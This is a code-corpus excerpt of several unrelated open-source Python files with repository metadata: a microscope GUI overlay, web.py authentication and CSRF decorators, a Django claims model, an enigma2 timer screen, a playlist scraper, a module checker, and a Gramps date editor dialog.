# Tick start and end poiint (outer and inner)
ox = self.center_x + self.radius * cos
oy = self.center_y + self.radius * sin
ix = self.center_x + (self.radius - self.ticksize) * cos
iy = self.center_y + (self.radius - self.ticksize) * sin
# Tick label positions
lx = self.center_x + (self.radius + 5) * cos
ly = self.center_y + (self.radius + 5) * sin
label = self.add_label(u"%d°" % (deg + 90),
(lx, ly),
colour=(0.8, 0.8, 0.8),
deg=deg - 90,
flip=True,
align=wx.ALIGN_CENTRE_HORIZONTAL | wx.ALIGN_BOTTOM)
self.ticks.append((ox, oy, ix, iy, label))
self._calculate_display()
if evt:
base.ViewOverlay.on_size(self, evt)
# END Event Handlers
def draw(self, ctx):
# Draw angle lines
ctx.set_line_width(2.5)
ctx.set_source_rgba(0, 0, 0, 0.2 if self.dragging else 0.5)
if self.theta is not None:
# Draw dark underline azimuthal circle
ctx.arc(self.center_x, self.center_y,
self.theta_radius, 0, self.tau)
ctx.stroke()
if self.phi is not None:
# Draw dark underline Phi line
ctx.move_to(self.center_x, self.center_y)
ctx.line_to(*self.phi_line_pos)
ctx.stroke()
# Light selection lines formatting
ctx.set_line_width(2)
ctx.set_dash([3])
if self.dragging:
ctx.set_source_rgba(*self.colour_drag)
else:
ctx.set_source_rgb(*self.colour)
if self.theta is not None:
# Draw azimuthal circle
ctx.arc(self.center_x, self.center_y,
self.theta_radius, 0, self.tau)
ctx.stroke()
self._write_label(ctx, self.theta_label)
if self.phi is not None:
# Draw Phi line
ctx.move_to(self.center_x, self.center_y)
ctx.line_to(*self.phi_line_pos)
ctx.stroke()
self._write_label(ctx, self.phi_label)
ctx.set_dash([])
# ## Draw angle markings ###
# Draw frame that covers everything outside the center circle
ctx.set_fill_rule(cairo.FILL_RULE_EVEN_ODD)
ctx.set_source_rgb(0.2, 0.2, 0.2)
ctx.rectangle(0, 0, self.cnvs.ClientSize.x, self.cnvs.ClientSize.y)
ctx.arc(self.center_x, self.center_y, self.inner_radius, 0, self.tau)
# mouse_inside = not ctx.in_fill(float(self.vx or 0), float(self.vy or 0))
ctx.fill()
# Draw Azimuth degree circle
ctx.set_line_width(2)
ctx.set_source_rgb(0.5, 0.5, 0.5)
ctx.arc(self.center_x, self.center_y, self.radius, 0, self.tau)
ctx.stroke()
# Draw Azimuth degree ticks
ctx.set_line_width(1)
for sx, sy, lx, ly, _ in self.ticks:
ctx.move_to(sx, sy)
ctx.line_to(lx, ly)
ctx.stroke()
# Draw tick labels, ignore padding in this case
pad, self.canvas_padding = self.canvas_padding, 0
for _, _, _, _, label in self.ticks:
self._write_label(ctx, label)
self.canvas_padding = pad
if self.intensity_label.text and self.intersection:
ctx.set_source_rgb(*self.colour_highlight)
ctx.arc(self.intersection[0], self.intersection[1], 3, 0, self.tau)
ctx.fill()
x, y = self.intersection
y -= 18
if y < 40:
y += 40
self.intensity_label.pos = (x, y)
self._write_label(ctx, self.intensity_label)
class PointSelectOverlay(base.ViewOverlay):
""" Overlay for the selection of canvas points in view, world and physical coordinates """
def __init__(self, cnvs):
base.ViewOverlay.__init__(self, cnvs)
# Prevent the cursor from resetting on clicks
# Physical position of the last click
self.v_pos = model.VigilantAttribute(None)
self.w_pos = model.VigilantAttribute(None)
self.p_pos = model.VigilantAttribute(None)
# Event Handlers
def on_enter(self, evt):
if self.active:
self.cnvs.set_default_cursor(wx.CROSS_CURSOR)
else:
base.ViewOverlay.on_enter(self, evt)
def on_leave(self, evt):
if self.active:
self.cnvs.reset_default_cursor()
else:
base.ViewOverlay.on_leave(self, evt)
def on_left_down(self, evt):
if not self.active:
base.ViewOverlay.on_left_down(self, evt)
def on_left_up(self, evt):
if self.active:
v_pos = evt.GetPositionTuple()
w_pos = self.cnvs.view_to_world(v_pos, self.cnvs.get_half_buffer_size())
self.v_pos.value = v_pos
self.w_pos.value = w_pos
self.p_pos.value = self.cnvs.world_to_physical_pos(w_pos)
logging.debug("Point selected (view, world, physical): %s, %s, %s)",
self.v_pos.value, self.w_pos.value, self.p_pos.value)
else:
base.ViewOverlay.on_left_up(self, evt)
# END Event Handlers
def draw(self, ctx):
pass
class HistoryOverlay(base.ViewOverlay):
""" Display rectangles on locations that the microscope was previously positioned at """
def __init__(self, cnvs, history_list_va):
base.ViewOverlay.__init__(self, cnvs)
self.trail_colour = conversion.hex_to_frgb(gui.FG_COLOUR_HIGHLIGHT)
self.pos_colour = conversion.hex_to_frgb(gui.FG_COLOUR_EDIT)
self.fade = True # Fade older positions in the history list
self.history = history_list_va # ListVA of (center, size) tuples
self.history.subscribe(self._on_history_update)
def __str__(self):
return "History (%d): \n" % len(self) + "\n".join([str(h) for h in self.history.value[-5:]])
# # Event Handlers
#
# def on_enter(self, evt):
# base.ViewOverlay.on_enter(self, evt)
# self.cnvs.Refresh()
#
# def on_leave(self, evt):
# base.ViewOverlay.on_leave(self, evt)
# self.cnvs.Refresh()
#
# # END Event Handlers
# TODO: might need rate limiter (but normally stage position is changed rarely)
# TODO: Make the update of the canvas image the responsibility of the viewport
def _on_history_update(self, _):
self.cnvs.update_drawing()
def draw(self, ctx, scale=None, shift=None):
"""
scale (0<float): ratio between the canvas pixel size and the pixel size
of the drawing area. That's a trick to allow drawing both on the
standard view and directly onto the thumbnail.
shift (float, float): offset to add for positioning the drawing, when
it is scaled
"""
ctx.set_line_width(1)
offset = self.cnvs.get_half_buffer_size()
for i, (p_center, p_size) in enumerate(self.history.value):
alpha = (i + 1) * (0.8 / len(self.history.value)) + 0.2 if self.fade else 1.0
v_center = self.cnvs.world_to_view(self.cnvs.physical_to_world_pos(p_center), offset)
if scale:
v_center = (shift[0] + v_center[0] * scale,
shift[1] + v_center[1] * scale)
marker_size = (2, 2)
elif p_size:
marker_size = (int(p_size[0] * self.cnvs.scale),
int(p_size[0] * self.cnvs.scale))
# Prevent the marker from becoming too small
if marker_size[0] < 2 or marker_size[1] < 2:
marker_size = (3, 3)
else:
marker_size = (5, 5)
if i < len(self.history.value) - 1:
colour = self.trail_colour
else:
colour = self.pos_colour
self._draw_rect(ctx, v_center, marker_size, colour, alpha)
@staticmethod
def _draw_rect(ctx, v_center, v_size, colour, alpha):
ctx.set_source_rgba(0, 0, 0, alpha * 0.4)
x = int(v_center[0] - v_size[0] / 2.0) + 0.5
y = int(v_center[1] - v_size[1] / 2.0) + 0.5
ctx.rectangle(x + 1, y + 1, v_size[0], v_size[1])
ctx.stroke()
ctx.set_source_rgba(colour[0], colour[1], colour[2], alpha)
# Render rectangles of 3 pixels wide
ctx.rectangle(x, y, v_size[0], v_size[1])
ctx.stroke()
class SpotModeOverlay(base.ViewOverlay, base.DragMixin, base.SpotModeBase):
""" Render the spot mode indicator in the center of the view
If a position is provided, the spot will be drawn there.
If the overlay is activated, the user can use the mouse cursor to select a position
"""
def __init__(self, cnvs, spot_va=None):
base.ViewOverlay.__init__(self, cnvs)
base.DragMixin.__init__(self)
base.SpotModeBase.__init__(self, cnvs, spot_va=spot_va)
self.v_pos = None
def on_spot_change(self, _):
self._r_to_v()
def on_size(self, evt):
self._r_to_v()
base.ViewOverlay.on_size(self, evt)
def _v_to_r(self):
if self.v_pos is None:
self.r_pos.value = (0.5, 0.5)
else:
self.r_pos.value = (
float(self.v_pos[0] / self.cnvs.view_width),
float(self.v_pos[1] / self.cnvs.view_height)
)
def _r_to_v(self):
try:
self.v_pos = (
int(self.cnvs.view_width * self.r_pos.value[0]),
int(self.cnvs.view_height * self.r_pos.value[1])
)
except (TypeError, KeyError):
self.v_pos = None
def draw(self, ctx, shift=(0, 0), scale=1.0):
if self.v_pos is None:
return
vx, vy = self.v_pos
base.SpotModeBase.draw(self, ctx, vx, vy)
def activate(self):
self._r_to_v()
base.ViewOverlay.activate(self)
def deactivate(self):
self.v_pos = None
base.ViewOverlay.deactivate(self)
|
ktsitsikas/odemis
|
src/odemis/gui/comp/overlay/view.py
|
Python
|
gpl-2.0
| 50,884
|
# Author: Zhang Huangbin <zhb@iredmail.org>
import web
session = web.config.get('_session')
def require_login(func):
def proxyfunc(self, *args, **kw):
if session.get('logged') is True:
return func(self, *args, **kw)
else:
session.kill()
raise web.seeother('/login?msg=loginRequired')
return proxyfunc
def require_global_admin(func):
def proxyfunc(self, *args, **kw):
if session.get('domainGlobalAdmin') is True:
return func(self, *args, **kw)
else:
if session.get('logged'):
raise web.seeother('/domains?msg=PERMISSION_DENIED')
else:
raise web.seeother('/login?msg=PERMISSION_DENIED')
return proxyfunc
def csrf_protected(f):
def decorated(*args, **kw):
inp = web.input()
if not ('csrf_token' in inp and \
inp.csrf_token == session.pop('csrf_token', None)):
return web.render('error_csrf.html')
return f(*args, **kw)
return decorated
|
villaverde/iredadmin
|
controllers/decorators.py
|
Python
|
gpl-2.0
| 1,054
|
from django.db import models
from jokeregistryweb.jokes.models import Joke
class Claim(models.Model):
'''A claim of prior art (or infringement)'''
FILED = 0
APPROVED = 1
REJECTED = 2
STATUS_CHOICES = (
(FILED, 'Filed'),
(APPROVED, 'Approved'),
(REJECTED, 'Rejected')
)
infringing_joke = models.ForeignKey(
'jokes.Joke',
related_name='infringing_claim',
help_text='The infringing joke')
infringed_joke = models.ForeignKey(
'jokes.Joke',
related_name='infringed_claim',
help_text='The original joke')
text = models.TextField(help_text='additional detail', null=True, blank=True)
status = models.IntegerField(choices=STATUS_CHOICES, default=FILED)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-created', '-updated')
def approve(self):
if self.infringed_joke.created < self.infringing_joke.created:
self.infringing_joke.parent = self.infringed_joke
self.infringing_joke.save()
self.status = Claim.APPROVED
self.save()
def reject(self):
self.status = Claim.REJECTED
self.save()
|
jokeregistry/jokeregistryweb
|
jokeregistryweb/claims/models.py
|
Python
|
gpl-2.0
| 1,263
|
from functools import cmp_to_key
from time import time
from timer import TimerEntry as RealTimerEntry
from PowerTimer import PowerTimerEntry, AFTEREVENT
from Components.ActionMap import ActionMap
from Components.Button import Button
from Components.config import config
from Components.Label import Label
from Components.PowerTimerList import PowerTimerList, gettimerType, getafterEvent
from Components.Sources.StaticText import StaticText
from Components.Sources.ServiceEvent import ServiceEvent
from Screens.ChoiceBox import ChoiceBox
from Screens.MessageBox import MessageBox
from Screens.PowerTimerEntry import TimerEntry
from Screens.Screen import Screen
from Screens.TimerEntry import TimerLog
from Tools.BoundFunction import boundFunction
from Tools.FuzzyDate import FuzzyTime
class PowerTimerEditList(Screen):
EMPTY = 0
ENABLE = 1
DISABLE = 2
CLEANUP = 3
DELETE = 4
def __init__(self, session):
Screen.__init__(self, session)
self.skinName = "TimerEditList"
Screen.setTitle(self, _("PowerTimer list"))
self.onChangedEntry = []
list = []
self.list = list
self.fillTimerList()
self["timerlist"] = PowerTimerList(list)
self.key_red_choice = self.EMPTY
self.key_yellow_choice = self.EMPTY
self.key_blue_choice = self.EMPTY
self["key_red"] = Button(" ")
self["key_green"] = Button(_("Add"))
self["key_yellow"] = Button(" ")
self["key_blue"] = Button(" ")
self["description"] = Label()
self["ServiceEvent"] = ServiceEvent()
self["actions"] = ActionMap(["OkCancelActions", "DirectionActions", "ShortcutActions", "TimerEditActions"],
{
"ok": self.openEdit,
"cancel": self.leave,
"green": self.addCurrentTimer,
"log": self.showLog,
"left": self.left,
"right": self.right,
"up": self.up,
"down": self.down
}, -1)
self.setTitle(_("PowerTimer Overview"))
self.session.nav.PowerTimer.on_state_change.append(self.onStateChange)
self.onShown.append(self.updateState)
def createSummary(self):
return PowerTimerEditListSummary
def up(self):
self["timerlist"].instance.moveSelection(self["timerlist"].instance.moveUp)
self.updateState()
def down(self):
self["timerlist"].instance.moveSelection(self["timerlist"].instance.moveDown)
self.updateState()
def left(self):
self["timerlist"].instance.moveSelection(self["timerlist"].instance.pageUp)
self.updateState()
def right(self):
self["timerlist"].instance.moveSelection(self["timerlist"].instance.pageDown)
self.updateState()
def toggleDisabledState(self):
cur = self["timerlist"].getCurrent()
if cur:
t = cur
if t.disabled:
print("[PowerTimerEdit] try to enable timer")
t.enable()
else:
if t.isRunning():
if t.repeated:
list = (
(_("Stop current event but not coming events"), "stoponlycurrent"),
(_("Stop current event and disable coming events"), "stopall"),
(_("Don't stop current event but disable coming events"), "stoponlycoming")
)
self.session.openWithCallback(boundFunction(self.runningEventCallback, t), ChoiceBox, title=_("Repeating event currently recording... What do you want to do?"), list=list)
else:
t.disable()
self.session.nav.PowerTimer.timeChanged(t)
self.refill()
self.updateState()
def runningEventCallback(self, t, result):
if result is not None:
if result[1] == "stoponlycurrent" or result[1] == "stopall":
t.enable()
t.processRepeated(findRunningEvent=False)
self.session.nav.PowerTimer.doActivate(t)
if result[1] == "stoponlycoming" or result[1] == "stopall":
t.disable()
self.session.nav.PowerTimer.timeChanged(t)
self.refill()
self.updateState()
def removeAction(self, descr):
actions = self["actions"].actions
if descr in actions:
del actions[descr]
def updateState(self):
cur = self["timerlist"].getCurrent()
if cur:
if self.key_red_choice != self.DELETE:
self["actions"].actions.update({"red": self.removeTimerQuestion})
self["key_red"].setText(_("Delete"))
self.key_red_choice = self.DELETE
if cur.disabled and (self.key_yellow_choice != self.ENABLE):
self["actions"].actions.update({"yellow": self.toggleDisabledState})
self["key_yellow"].setText(_("Enable"))
self.key_yellow_choice = self.ENABLE
elif cur.isRunning() and not cur.repeated and (self.key_yellow_choice != self.EMPTY):
self.removeAction("yellow")
self["key_yellow"].setText("")
self.key_yellow_choice = self.EMPTY
elif ((not cur.isRunning()) or cur.repeated) and (not cur.disabled) and (self.key_yellow_choice != self.DISABLE):
self["actions"].actions.update({"yellow": self.toggleDisabledState})
self["key_yellow"].setText(_("Disable"))
self.key_yellow_choice = self.DISABLE
else:
if self.key_red_choice != self.EMPTY:
self.removeAction("red")
self["key_red"].setText("")
self.key_red_choice = self.EMPTY
if self.key_yellow_choice != self.EMPTY:
self.removeAction("yellow")
self["key_yellow"].setText("")
self.key_yellow_choice = self.EMPTY
showCleanup = True
for x in self.list:
if (not x[0].disabled) and (x[1] == True):
break
else:
showCleanup = False
if showCleanup and (self.key_blue_choice != self.CLEANUP):
self["actions"].actions.update({"blue": self.cleanupQuestion})
self["key_blue"].setText(_("Cleanup"))
self.key_blue_choice = self.CLEANUP
elif (not showCleanup) and (self.key_blue_choice != self.EMPTY):
self.removeAction("blue")
self["key_blue"].setText("")
self.key_blue_choice = self.EMPTY
if len(self.list) == 0:
return
timer = self['timerlist'].getCurrent()
if timer:
name = gettimerType(timer)
if getafterEvent(timer) == "Nothing":
after = ""
else:
after = getafterEvent(timer)
time = "%s %s ... %s" % (FuzzyTime(timer.begin)[0], FuzzyTime(timer.begin)[1], FuzzyTime(timer.end)[1])
duration = ("(%d " + _("mins") + ")") % ((timer.end - timer.begin) / 60)
if timer.state == RealTimerEntry.StateWaiting:
state = _("waiting")
elif timer.state == RealTimerEntry.StatePrepared:
state = _("about to start")
elif timer.state == RealTimerEntry.StateRunning:
state = _("running...")
elif timer.state == RealTimerEntry.StateEnded:
state = _("done!")
else:
state = _("<unknown>")
else:
name = ""
after = ""
time = ""
duration = ""
state = ""
for cb in self.onChangedEntry:
cb(name, after, time, duration, state)
def fillTimerList(self):
#helper function to move finished timers to end of list
def _cmp(a, b):
return (a > b) - (a < b)
def eol_compare(x, y):
if x[0].state != y[0].state and x[0].state == RealTimerEntry.StateEnded or y[0].state == RealTimerEntry.StateEnded:
return _cmp(x[0].state, y[0].state)
return _cmp(x[0].begin, y[0].begin)
_list = self.list
del _list[:]
_list.extend([(timer, False) for timer in self.session.nav.PowerTimer.timer_list])
_list.extend([(timer, True) for timer in self.session.nav.PowerTimer.processed_timers])
if config.usage.timerlist_finished_timer_position.index: #end of list
_list.sort(key=cmp_to_key(eol_compare))
else:
_list.sort(key=lambda x: x[0].begin)
def showLog(self):
cur = self["timerlist"].getCurrent()
if cur:
self.session.openWithCallback(self.finishedEdit, PowerTimerLog, cur)
def openEdit(self):
cur = self["timerlist"].getCurrent()
if cur:
self.session.openWithCallback(self.finishedEdit, TimerEntry, cur)
def cleanupQuestion(self):
self.session.openWithCallback(self.cleanupTimer, MessageBox, _("Really delete completed timers?"))
def cleanupTimer(self, delete):
if delete:
self.session.nav.PowerTimer.cleanup()
self.refill()
self.updateState()
def removeTimerQuestion(self):
cur = self["timerlist"].getCurrent()
if not cur:
return
self.session.openWithCallback(self.removeTimer, MessageBox, _("Do you really want to delete this timer ?"), default=False)
def removeTimer(self, result):
if not result:
return
list = self["timerlist"]
cur = list.getCurrent()
if cur:
timer = cur
timer.afterEvent = AFTEREVENT.NONE
self.session.nav.PowerTimer.removeEntry(timer)
self.refill()
self.updateState()
def refill(self):
oldsize = len(self.list)
self.fillTimerList()
lst = self["timerlist"]
newsize = len(self.list)
if oldsize and oldsize != newsize:
idx = lst.getCurrentIndex()
lst.entryRemoved(idx)
else:
lst.invalidate()
def addCurrentTimer(self):
data = (int(time() + 60), int(time() + 120))
self.addTimer(PowerTimerEntry(checkOldTimers=True, *data))
def addTimer(self, timer):
self.session.openWithCallback(self.finishedAdd, TimerEntry, timer)
def finishedEdit(self, answer):
if answer[0]:
entry = answer[1]
self.session.nav.PowerTimer.timeChanged(entry)
self.fillTimerList()
self.updateState()
else:
print("[PowerTimerEdit] PowerTimerEdit aborted")
def finishedAdd(self, answer):
if answer[0]:
entry = answer[1]
simulTimerList = self.session.nav.PowerTimer.record(entry)
self.fillTimerList()
self.updateState()
else:
print("[PowerTimerEdit] TimerEdit aborted")
def finishSanityCorrection(self, answer):
self.finishedAdd(answer)
def leave(self):
self.session.nav.PowerTimer.on_state_change.remove(self.onStateChange)
self.close()
def onStateChange(self, entry):
self.refill()
self.updateState()
class PowerTimerEditListSummary(Screen):
def __init__(self, session, parent):
Screen.__init__(self, session, parent=parent)
self["name"] = StaticText("")
self["after"] = StaticText("")
self["time"] = StaticText("")
self["duration"] = StaticText("")
self["state"] = StaticText("")
self.onShow.append(self.addWatcher)
self.onHide.append(self.removeWatcher)
def addWatcher(self):
self.parent.onChangedEntry.append(self.selectionChanged)
self.parent.updateState()
def removeWatcher(self):
self.parent.onChangedEntry.remove(self.selectionChanged)
def selectionChanged(self, name, after, time, duration, state):
self["name"].text = name
self["after"].text = after
self["time"].text = time
self["duration"].text = duration
self["state"].text = state
class PowerTimerLog(TimerLog):
def __init__(self, session, timer):
TimerLog.__init__(self, session, timer)
self.skinName = "TimerLog"
self.setTitle(_("PowerTimer Log"))
|
openatv/enigma2
|
lib/python/Screens/PowerTimerEdit.py
|
Python
|
gpl-2.0
| 10,350
|
import os
import cPickle as pkl
from collections import namedtuple
import requests
from bs4 import BeautifulSoup
Song = namedtuple('Song', ['title', 'artist', 'album', 'length'])
class Playlist(object):
def __init__(self, title, url):
self.title = title
self.file_name = title.lower().replace(' ', '-') + '.pkl'
self.url = url
if os.path.isfile(self.file_name):
self.load_from_pickle()
else:
self.songs = []
def load_from_pickle(self):
with open(self.file_name, 'rb') as in_file:
self.songs = pkl.load(in_file)
def download_data(self):
url = self.url
resp = requests.get(url)
soup = BeautifulSoup(resp.text)
for song_elem in (soup.find(class_='songs')
.find_all(class_='media-body')):
title = song_elem.h4.text
ps = song_elem.find_all('p')
artist, album = ps[0].text.split(u' \xb7 ')
length = ps[1].text
song = Song(title, artist, album, length)
self.songs.append(song)
with open(self.file_name, 'wb') as out:
pkl.dump(self.songs, out)
ambient_bass = Playlist(
'ambient bass',
'http://www.playlister.io/items/playlist/1472493/ambient-bass/#')
beats = Playlist(
'Blissed-Out Beats',
'http://www.playlister.io/items/playlist/1682151/')
liquid = Playlist(
'Liquid Dubstep',
'http://www.playlister.io/items/playlist/1404323/')
liquid.download_data()
|
mshuffett/MetaPyMusic
|
playlister.py
|
Python
|
gpl-2.0
| 1,557
|
# -*- coding: utf-8 -*-
"""Module to check modules existance.
This exports this booleans:
- has_reportlab -- True if reportlab is found
- has_PIL -- True if PIL is found
- has_pygtk -- True if pygtk is found
Copyright (C) 2005-2008 Xosé Otero <xoseotero@users.sourceforge.net>
"""
__all__ = ["has_reportlab", "has_PIL", "has_pygtk"]
try:
import reportlab
has_reportlab = True
except ImportError:
has_reportlab = False
try:
import PIL
has_PIL = True
except:
has_PIL = False
try:
import pygtk
pygtk.require('2.0')
import gtk
import pango
has_pygtk = True
except:
has_pygtk = False
|
ternus/arcnet
|
cyber/pythonsudoku/check_modules.py
|
Python
|
gpl-2.0
| 644
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2002-2006 Donald N. Allingham
# Copyright (C) 2009 Douglas S. Blank
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
"""
Date editing module for GRAMPS.
The EditDate provides visual feedback to the user via a pixamp
to indicate if the associated GtkEntry box contains a valid date. Green
means complete and regular date. Yellow means a valid, but not a regular date.
Red means that the date is not valid, and will be viewed as a text string
instead of a date.
The DateEditor provides a dialog in which the date can be
unambiguously built using UI controls such as menus and spin buttons.
"""
#-------------------------------------------------------------------------
#
# Python modules
#
#-------------------------------------------------------------------------
#-------------------------------------------------------------------------
#
# set up logging
#
#-------------------------------------------------------------------------
import logging
__LOG = logging.getLogger(".EditDate")
#-------------------------------------------------------------------------
#
# GNOME modules
#
#-------------------------------------------------------------------------
from gi.repository import Gtk
#-------------------------------------------------------------------------
#
# gramps modules
#
#-------------------------------------------------------------------------
from gramps.gen.ggettext import sgettext as _
from gramps.gen.lib.date import Date
from gramps.gen.datehandler import displayer
from gramps.gen.const import URL_MANUAL_PAGE
from ..display import display_help
from ..managedwindow import ManagedWindow
from ..glade import Glade
#-------------------------------------------------------------------------
#
# Constants
#
#-------------------------------------------------------------------------
MOD_TEXT = (
(Date.MOD_NONE , _('Regular')),
(Date.MOD_BEFORE , _('Before')),
(Date.MOD_AFTER , _('After')),
(Date.MOD_ABOUT , _('About')),
(Date.MOD_RANGE , _('Range')),
(Date.MOD_SPAN , _('Span')),
(Date.MOD_TEXTONLY , _('Text only')) )
QUAL_TEXT = (
(Date.QUAL_NONE, _('Regular')),
(Date.QUAL_ESTIMATED, _('Estimated')),
(Date.QUAL_CALCULATED, _('Calculated')) )
CAL_TO_MONTHS_NAMES = {
Date.CAL_GREGORIAN : displayer.short_months,
Date.CAL_JULIAN : displayer.short_months,
Date.CAL_HEBREW : displayer.hebrew,
Date.CAL_FRENCH : displayer.french,
Date.CAL_PERSIAN : displayer.persian,
Date.CAL_ISLAMIC : displayer.islamic,
Date.CAL_SWEDISH : displayer.swedish }
WIKI_HELP_PAGE = '%s_-_Entering_and_Editing_Data:_Detailed_-_part_1' % URL_MANUAL_PAGE
WIKI_HELP_SEC = _('manual|Editing_Dates')
#-------------------------------------------------------------------------
#
# EditDate
#
#-------------------------------------------------------------------------
class EditDate(ManagedWindow):
"""
Dialog allowing to build the date precisely, to correct possible
limitations of parsing and/or underlying structure of Date.
"""
def __init__(self, date, uistate, track):
"""
Initiate and display the dialog.
"""
ManagedWindow.__init__(self, uistate, track, self)
# Create self.date as a copy of the given Date object.
self.date = Date(date)
self.top = Glade()
self.set_window(
self.top.toplevel,
self.top.get_object('title'),
_('Date selection'))
self.calendar_box = self.top.get_object('calendar_box')
for name in Date.ui_calendar_names:
self.calendar_box.get_model().append([name])
self.calendar_box.set_active(self.date.get_calendar())
self.calendar_box.connect('changed', self.switch_calendar)
self.quality_box = self.top.get_object('quality_box')
for item_number in range(len(QUAL_TEXT)):
self.quality_box.append_text(QUAL_TEXT[item_number][1])
if self.date.get_quality() == QUAL_TEXT[item_number][0]:
self.quality_box.set_active(item_number)
self.type_box = self.top.get_object('type_box')
for item_number in range(len(MOD_TEXT)):
self.type_box.append_text(MOD_TEXT[item_number][1])
if self.date.get_modifier() == MOD_TEXT[item_number][0]:
self.type_box.set_active(item_number)
self.type_box.connect('changed', self.switch_type)
self.start_month_box = self.top.get_object('start_month_box')
self.stop_month_box = self.top.get_object('stop_month_box')
month_names = CAL_TO_MONTHS_NAMES[self.date.get_calendar()]
for name in month_names:
self.start_month_box.append_text(name)
self.stop_month_box.append_text(name)
self.start_month_box.set_active(self.date.get_month())
self.stop_month_box.set_active(self.date.get_stop_month())
self.start_day = self.top.get_object('start_day')
self.start_day.set_value(self.date.get_day())
self.start_year = self.top.get_object('start_year')
self.start_year.set_value(self.date.get_year())
self.stop_day = self.top.get_object('stop_day')
self.stop_day.set_value(self.date.get_stop_day())
self.stop_year = self.top.get_object('stop_year')
self.stop_year.set_value(self.date.get_stop_year())
self.dual_dated = self.top.get_object('dualdated')
self.new_year = self.top.get_object('newyear')
self.new_year.set_text(self.date.newyear_to_str())
# Disable second date controls if not compound date
if not self.date.is_compound():
self.stop_day.set_sensitive(0)
self.stop_month_box.set_sensitive(0)
self.stop_year.set_sensitive(0)
# Disable the rest of controls if a text-only date
if self.date.get_modifier() == Date.MOD_TEXTONLY:
self.start_day.set_sensitive(0)
self.start_month_box.set_sensitive(0)
self.start_year.set_sensitive(0)
self.calendar_box.set_sensitive(0)
self.quality_box.set_sensitive(0)
self.dual_dated.set_sensitive(0)
self.new_year.set_sensitive(0)
self.text_entry = self.top.get_object('date_text_entry')
self.text_entry.set_text(self.date.get_text())
if self.date.get_slash():
self.dual_dated.set_active(1)
self.calendar_box.set_sensitive(0)
self.calendar_box.set_active(Date.CAL_JULIAN)
self.dual_dated.connect('toggled', self.switch_dual_dated)
# The dialog is modal -- since dates don't have names, we don't
# want to have several open dialogs, since then the user will
# loose track of which is which. Much like opening files.
self.return_date = None
self.show()
while True:
response = self.window.run()
if response == Gtk.ResponseType.HELP:
display_help(webpage=WIKI_HELP_PAGE,
section=WIKI_HELP_SEC)
elif response == Gtk.ResponseType.DELETE_EVENT:
break
else:
if response == Gtk.ResponseType.OK:
(the_quality, the_modifier, the_calendar, the_value,
the_text, the_newyear) = self.build_date_from_ui()
self.return_date = Date(self.date)
self.return_date.set(
quality=the_quality,
modifier=the_modifier,
calendar=the_calendar,
value=the_value,
text=the_text,
newyear=the_newyear)
self.close()
break
def build_menu_names(self, obj):
"""
Define the menu entry for the ManagedWindows
"""
return (_("Date selection"), None)
def build_date_from_ui(self):
"""
Collect information from the UI controls and return
5-tuple of (quality,modifier,calendar,value,text)
"""
# It is important to not set date based on these controls.
# For example, changing the caledar makes the date inconsistent
# until the callback of the calendar menu is finished.
# We need to be able to use this function from that callback,
# so here we just report on the state of all widgets, without
# actually modifying the date yet.
modifier = MOD_TEXT[self.type_box.get_active()][0]
text = self.text_entry.get_text()
if modifier == Date.MOD_TEXTONLY:
return (Date.QUAL_NONE, Date.MOD_TEXTONLY, Date.CAL_GREGORIAN,
Date.EMPTY,text, Date.NEWYEAR_JAN1)
quality = QUAL_TEXT[self.quality_box.get_active()][0]
if modifier in (Date.MOD_RANGE, Date.MOD_SPAN):
value = (
self.start_day.get_value_as_int(),
self.start_month_box.get_active(),
self.start_year.get_value_as_int(),
self.dual_dated.get_active(),
self.stop_day.get_value_as_int(),
self.stop_month_box.get_active(),
self.stop_year.get_value_as_int(),
self.dual_dated.get_active())
else:
value = (
self.start_day.get_value_as_int(),
self.start_month_box.get_active(),
self.start_year.get_value_as_int(),
self.dual_dated.get_active())
calendar = self.calendar_box.get_active()
newyear = Date.newyear_to_code(self.new_year.get_text())
return (quality, modifier, calendar, value, text, newyear)
def switch_type(self, obj):
"""
Disable/enable various date controls depending on the date
type selected via the menu.
"""
the_modifier = MOD_TEXT[self.type_box.get_active()][0]
# Disable/enable second date controls based on whether
# the type allows compound dates
if the_modifier in (Date.MOD_RANGE, Date.MOD_SPAN):
stop_date_sensitivity = 1
else:
stop_date_sensitivity = 0
self.stop_day.set_sensitive(stop_date_sensitivity)
self.stop_month_box.set_sensitive(stop_date_sensitivity)
self.stop_year.set_sensitive(stop_date_sensitivity)
# Disable/enable the rest of the controls if the type is text-only.
date_sensitivity = not the_modifier == Date.MOD_TEXTONLY
self.start_day.set_sensitive(date_sensitivity)
self.start_month_box.set_sensitive(date_sensitivity)
self.start_year.set_sensitive(date_sensitivity)
self.calendar_box.set_sensitive(date_sensitivity)
self.quality_box.set_sensitive(date_sensitivity)
self.dual_dated.set_sensitive(date_sensitivity)
self.new_year.set_sensitive(date_sensitivity)
def switch_dual_dated(self, obj):
"""
Changed whether this is a dual dated year, or not.
Dual dated years are represented in the Julian calendar
so that the day/months don't changed in the Text representation.
"""
if self.dual_dated.get_active():
self.calendar_box.set_active(Date.CAL_JULIAN)
self.calendar_box.set_sensitive(0)
else:
self.calendar_box.set_sensitive(1)
def switch_calendar(self, obj):
"""
Change month names and convert the date based on the calendar
selected via the menu.
"""
old_cal = self.date.get_calendar()
new_cal = self.calendar_box.get_active()
(the_quality, the_modifier, the_calendar,
the_value, the_text, the_newyear) = self.build_date_from_ui()
self.date.set(
quality=the_quality,
modifier=the_modifier,
calendar=old_cal,
value=the_value,
text=the_text,
newyear=the_newyear)
if not self.date.is_empty():
self.date.convert_calendar(new_cal)
self.start_month_box.get_model().clear()
self.stop_month_box.get_model().clear()
month_names = CAL_TO_MONTHS_NAMES[new_cal]
for name in month_names:
self.start_month_box.append_text(name)
self.stop_month_box.append_text(name)
self.start_day.set_value(self.date.get_day())
self.start_month_box.set_active(self.date.get_month())
self.start_year.set_value(self.date.get_year())
self.stop_day.set_value(self.date.get_stop_day())
self.stop_month_box.set_active(self.date.get_stop_month())
